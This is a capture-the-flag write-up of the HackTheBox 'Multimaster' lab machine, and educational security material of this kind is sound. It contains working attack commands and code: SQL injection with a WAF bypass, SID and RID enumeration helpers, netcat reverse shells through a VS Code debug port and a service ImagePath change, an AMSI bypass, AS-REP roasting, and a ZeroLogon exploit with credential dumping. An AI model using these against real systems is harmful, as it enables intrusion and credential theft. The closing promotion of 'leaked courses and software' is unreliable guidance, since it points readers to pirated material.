Hello, Ralf here. I continue publishing solutions for machines that have been sent to retirement on the HackTheBox site.
There is a lot in this article. We will look at how to conveniently combine Burp Suite with sqlmap, how to enumerate domain users through MSSQL, how to exploit a vulnerability in Visual Studio Code, how to bypass AMSI, how to perform AS-REP Roasting to obtain credentials, and how to escalate privileges from the Server Operators group. In addition, as a demonstration of the new ZeroLogon vulnerability, we will capture the same machine a different way in under five minutes.
Organizational information
Connection to the lab is over VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, since you end up on a private network with people who know a thing or two about information security.
Recon
The machine's IP address is 10.10.10.179, which I add to /etc/hosts.
10.10.10.179 multimaster.htb
The first step is to scan the open ports. Since scanning all ports with nmap takes a long time, I first scan with masscan: all TCP and UDP ports from the tun0 interface at 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.179 --rate=500
Many ports are open on the host. Now let's scan them with nmap, filter out the noise and pick the ones we need.
nmap multimaster.htb -p593,49674,139,5985,49744,445,636,80,49667,3268,464,389,53,135,88,9389,3269,49676,49666,49699,49675,3389
Next, to get detailed information about the services running on those ports, we run a scan with the -A option.
nmap -A multimaster.htb -p593,139,5985,445,636,80,3268,464,389,53,135,88,9389,3269,3389
SMB and LDAP give us nothing, so let's look at the web.
The site has a login form and a search form.
Moreover, the search matches on substrings.
So we can assume that the SQL query uses the LIKE operator, and therefore we can try to get every record returned with a wildcard.
It turns out there is a SQL injection.
But something went wrong: apparently a WAF is in use.
However, it turned out that it can be bypassed by Unicode-escaping the payload (\uXXXX form).
Then we find the number of columns.
So the injection is fully confirmed.
Sqlmap + Burp Suite
To work with the database comfortably we use sqlmap. We already know the encoding method and the DBMS, so we reflect that in the parameters. We also save the request from Burp Suite to a file and pass it to sqlmap. Let's first determine which user the queries run as.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --current-user
Unfortunately we got the same answer as without the encoding. Let's set Burp as sqlmap's proxy and, to save time, restrict sqlmap to the union-based technique (--technique=U).
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --current-user
Intercepting the request in Burp, we see that the encoding looks slightly different (%uXXXX instead of \uXXXX).
Let's check whether this form works by encoding a payload we already know in the same way.
And it doesn't work. So we need to change the form of the encoding, which can be done in Burp: go to the Proxy -> Options tab, Match and Replace section.
Add a rule that replaces %u with \u in the request body.
And make sure it is active.
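To make the encoding concrete, here is an added Python example of mine (not code from the original writeup or from the target) that escapes a payload the way the WAF bypass above requires, reproduces the Burp Match and Replace rule that turns sqlmap's %uXXXX form into \uXXXX, and shows what the application receives once the JSON body is parsed. The JSON field name, the JSON body itself and the LIKE-based query shape are assumptions for the example.

```python
import json
import re

# Added example, not the target's code. Assumptions: the search endpoint takes a
# JSON body and builds a query like  ... WHERE name LIKE '%<input>%'


def unicode_escape(payload: str) -> str:
    """Escape every character as a JSON \\uXXXX sequence, so the WAF never sees a quote."""
    return "".join("\\u%04x" % ord(c) for c in payload)


def percent_u_to_backslash_u(body: str) -> str:
    """The Burp Match and Replace rule: sqlmap's charunicodeencode tamper emits
    %uXXXX, but a JSON string needs \\uXXXX."""
    return re.sub(r"%u([0-9a-fA-F]{4})", r"\\u\1", body)


def server_side_value(escaped: str) -> str:
    """What the application gets after the JSON parser runs: the original payload."""
    return json.loads('"%s"' % escaped)


def union_probe(columns: int) -> str:
    """Column-count probe for a LIKE '%...%' query: close the string literal,
    UNION the right number of NULLs, comment out the trailing %'."""
    return "' UNION SELECT %s-- -" % ",".join(["NULL"] * columns)


def build_body(field: str, payload: str) -> str:
    """Raw JSON body with the escaped payload in the given field (field name is assumed)."""
    return '{"%s":"%s"}' % (field, unicode_escape(payload))


if __name__ == "__main__":
    body = build_body("name", union_probe(5))
    print(body)                        # what the WAF inspects: no quote characters at all
    print(json.loads(body)["name"])    # what reaches the SQL query
```

Note that the WAF only inspects the raw request body, while the quote reappears only after the JSON parser has run server-side; that is the whole reason the two encodings (%u vs \u) matter, since only \u is decoded by a JSON parser.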
Now let's run sqlmap again.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --random-agent --current-user
In Burp we already see the modified request.
Let all the requests through, and in sqlmap we get the name of the current user.
But then an error appears. Apparently the WAF again; let's add a 3 second delay and look at the privileges.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --delay=3 --random-agent --privileges
Nothing useful for us there. Let's look at the databases.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --delay=3 --dbs
Let's look at the tables in Hub_DB.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --delay=3 -D Hub_DB --tables
Exactly what we need: a Logins table. Let's dump all of its data.
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U --proxy http://127.0.0.1:8080 --delay=3 -D Hub_DB -T Logins --dump
So we have users and password hashes. Let's take one of the hashes (all four are different) and work out what it is.
Here we try the candidate hashcat modes one after another.
There are three in total, and the last one (17900) cracks three of the hashes.
hashcat -a 0 -m 17900 hashes.txt ./tools/rockyou.txt
However, these passwords are not valid for SMB. Let's dig further.
USER
Since we can read data out of MSSQL, we can enumerate domain users. Here is how. First we need the domain name.
Next we need its SID. If we find the SID of any domain object and drop the RID from it, we get the domain SID. Every domain has a Domain Admins group, so we can count on that object existing. Let's look up its SID.
It comes back as binary, so to display it readably we use the sys.fn_varbintohexstr function.
Now we have the object's SID. The idea is this: take the domain SID, append different RIDs, and for each SID that exists get the account name. For example, the Administrator's RID is 500. From the SID we received we take the first 24 bytes (48 hex characters); the remaining 4 bytes are the RID.
Finally we append RID 500 (don't forget to reverse the byte order: the RID is stored little-endian).
And now we get the account name from our SID.
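The SID handling above is easy to get wrong (byte order, where the RID starts), so here is an added Python example of mine, not code from the original writeup, that turns the hex blob returned by sys.fn_varbintohexstr into a textual SID, rebuilds a SID for another RID, and produces both the T-SQL lookup expression and the \u-escaped Intruder payload. It assumes the object SID is obtained with the T-SQL function SUSER_SID and resolved back to a name with SUSER_SNAME (the page shows only screenshots of the queries); the domain SID below is constructed, not MEGACORP's.

```python
import struct

# Added example, not from the original writeup. The SID is constructed:
# S-1-5-21-1234567890-1234567890-1234567890-512 (RID 512 = Domain Admins).
SAMPLE_OBJECT_SID_HEX = (
    "0x"
    + "0105"                 # revision 1, five sub-authorities
    + "000000000005"         # identifier authority 5 (NT Authority), big-endian
    + "15000000"             # sub-authority 21 (0x15), little-endian
    + "d2029649" * 3         # three constructed domain sub-authorities (1234567890)
    + "00020000"             # RID 512, little-endian
)


def strip_0x(h: str) -> str:
    return h[2:] if h.lower().startswith("0x") else h


def parse_sid(hexstr: str) -> str:
    """Binary SID (as fn_varbintohexstr prints it) -> 'S-1-5-21-...' text form."""
    raw = bytes.fromhex(strip_0x(hexstr))
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def domain_prefix(object_sid_hex: str) -> str:
    """First 24 bytes (48 hex chars) of any domain object's SID: everything but the RID."""
    return strip_0x(object_sid_hex)[:48]


def rid_hex_le(rid: int) -> str:
    """RID as four little-endian bytes in hex, e.g. 500 -> 'f4010000'."""
    return struct.pack("<I", rid).hex()


def sid_hex_for_rid(prefix: str, rid: int) -> str:
    """Full SID hex literal for another RID in the same domain."""
    return "0x" + prefix + rid_hex_le(rid)


def suser_sname_fragment(prefix: str, rid: int) -> str:
    """T-SQL expression resolving the SID to an account name (NULL if the RID does not exist)."""
    return "SUSER_SNAME(%s)" % sid_hex_for_rid(prefix, rid)


def unicode_escape(text: str) -> str:
    """\\uXXXX-escape every character, as required by the WAF bypass used above."""
    return "".join("\\u%04x" % ord(c) for c in text)


def intruder_payload(rid: int) -> str:
    """The variable part for Burp Intruder: all eight RID hex digits, each \\u-escaped."""
    return unicode_escape(rid_hex_le(rid))


if __name__ == "__main__":
    prefix = domain_prefix(SAMPLE_OBJECT_SID_HEX)
    print(parse_sid(SAMPLE_OBJECT_SID_HEX))
    print(suser_sname_fragment(prefix, 500))
    print(intruder_payload(500))
```

Unlike the generator further down, which escapes only the two low bytes of the RID and leaves the two high bytes fixed in the request, intruder_payload escapes all four bytes, so it also covers RIDs above 65535 if a domain ever needs them.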
Since this works, let's enumerate the domain objects. For the iteration we will use Burp Intruder.
Sending the request to Intruder, we mark the RID bytes as the payload position. Now we need to generate the values for them.
# RIDs to try: 1100-1149, 2100-2149, ..., 8100-8149
for i in range(1100, 9100, 1000):
    for j in range(50):
        # RID as four hex digits, e.g. 1100 -> '044c'
        h = hex(i + j)[2:].rjust(4, '0')
        SID = ""
        # swap the two bytes (the RID is stored little-endian) and emit each hex
        # digit as its ASCII code, e.g. '4' -> 0x34; the 0x is replaced by \u00 later
        for c in (h[2:] + h[:2]):
            SID += "0x" + hex(ord(c))[2:]
        print(SID)
Save the result to a file and load it into Burp.
Also turn off URL encoding and replace every 0x with \u00.
Remember the WAF: we use a single thread and a delay between requests.
Start the attack, sort by response length, and observe a lot of objects.
Select all the users and save them to a file. We have three passwords, so spray them over SMB and find a valid pair.
Connect over WinRM, and we are on the system.
USER2
Once on the system we do reconnaissance. I use winPEAS for this: upload it to the machine and run it. It found nothing interesting.
So let's take the hard way. We need to collect as many credentials as possible. Let's start with the usernames present on the system.
Save them all to a file. Now, where can we find a password? The server uses a database, and a password is needed to connect to it. Let's try to get it.
But we have no permissions on the web server directory. Not knowing what else to look for, I had not yet closed the question of which software runs on the server. Let's look at the process list.
And VSCode catches the eye.
So Visual Studio Code 1.37.1 is running on the server, and of course there is a vulnerability that allows code execution.
Specifically:
An elevation of privilege vulnerability exists when Visual Studio Code exposes a debug listener to users of a local computer.
An attacker can exploit this by injecting arbitrary code that runs in the context of the current user. The attacker needs to identify the port Visual Studio Code is listening on; cefdebug can be used to connect to the VS Code port (the listener speaks the Chrome DevTools Protocol over a WebSocket, which is why the URL below is ws://).
Let's find the listening port.
Great, there is such a port. Let's execute code in the context of the VS Code process: we run a netcat back-connect shell through it.
.\cefdebug.exe --url ws://127.0.0.1:43819/da4e5078-2eaf-4b30-bac1-96370f4d2b3d --code "process.mainModule.require('child_process').exec('cmd.exe /c C:\\Temp\\nc64.exe -e cmd.exe 10.10.15.60 4321')"
And the connection succeeds.
Let's look around the directories.
Of everything there, the API is the most interesting. Let's download it.
I switched to Windows and checked what the library was written in.
It is C#, so the project can be decompiled. I use dnSpy.
And in the source code we find a password. To learn which user it belongs to, we use a login brute force (password spraying) with CrackMapExec.
cme smb multimaster.htb -u users.txt -p "D3veL0pM3nT!"
And we pick up one more user.
USER3
When trying to download and use reconnaissance tools, we get blocked by AMSI. Let's deal with it using Invoke-AlokS-AvBypass.
Now SharpHound can be uploaded to the host safely.
After running it, we see the archive.
Download it to the local host and drag it into BloodHound. Then in Queries select "Shortest Paths to High Value Targets".
Digging into the graph, we find a relation between the user we control and another domain user.
Let's look at the help for this edge.
So we can obtain the hash of that user's password (the process itself has already been described in two similar articles): enable the "Do not require Kerberos preauthentication" property on the account.
And request the AS-REP.
Copy the hash and crack it with hashcat.
hashcat -a 0 -m 18200 krb_hashes.txt ./tools/rockyou.txt
We get the user's password and log in successfully.
ROOT
Having looked at the information about the user, we find that he is a member of the Server Operators group.
Members of this group can configure and start services (and services on Windows run as SYSTEM). In this case we do it through SensorDataService.
Let's change the service's executable to a netcat back-connect command.
reg add "HKLM\System\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Temp\nc64.exe -e powershell 10.10.15.60 4321" /f
After starting the service we see a connection on port 4321.
sc.exe start SensorDataService
We are SYSTEM.
CVE-2020-1472
Now, for demonstration, let's try to take over the domain controller without any entry point or supporting account. For this we use the recently notorious ZeroLogon vulnerability (CVE-2020-1472).
In short, CVE-2020-1472 is a flaw in the cryptographic authentication scheme of the Netlogon Remote Protocol, which is used to authenticate users and machines in domain-based networks; in particular, Netlogon is also used to update computer account passwords remotely. The weakness (AES-CFB8 with an all-zero IV, so an all-zero client challenge yields an all-zero credential for about one key in 256) lets an attacker impersonate a client computer and, after roughly 256 attempts on average, reset the domain controller's computer account password to empty.
As a test, let's try requesting a credential dump (via replication) using the hash 31d6cfe0d16ae931b73c59d7e0c089c0 (empty password) for the DC machine account.
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'MEGACORP/MULTIMASTER$@10.10.10.179'
Now let's use the exploit.
CVE-2020-1472.py MULTIMASTER MULTIMASTER$ 10.10.10.179
We are told the attack succeeded. Request the credential dump again, and this time we get them. Keep in mind that the exploit has just set the DC computer account password to empty in AD, which breaks the DC's own secure channel; on a real engagement restore the original machine account password (it is in the dump) right away.
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'MEGACORP/MULTIMASTER$@10.10.10.179'
And with the administrator's hash we can connect over WinRM.
In particular, that is how a domain controller running one of the following can be taken over:
- Windows Server 2019, all versions of Windows Server 2016
- all variants of Windows Server, version 1909
- Windows Server, version 1903
- Windows Server, version 1809 (Datacenter, Standard)
- Windows Server 2012 R2
- Windows Server 2012
- Windows Server 2008 R2 Service Pack 1
You can join us on Telegram. There you will find interesting materials, leaked courses and software. Let's build a community with people who are versed in many areas of IT; then we can always help each other with IT and information security questions.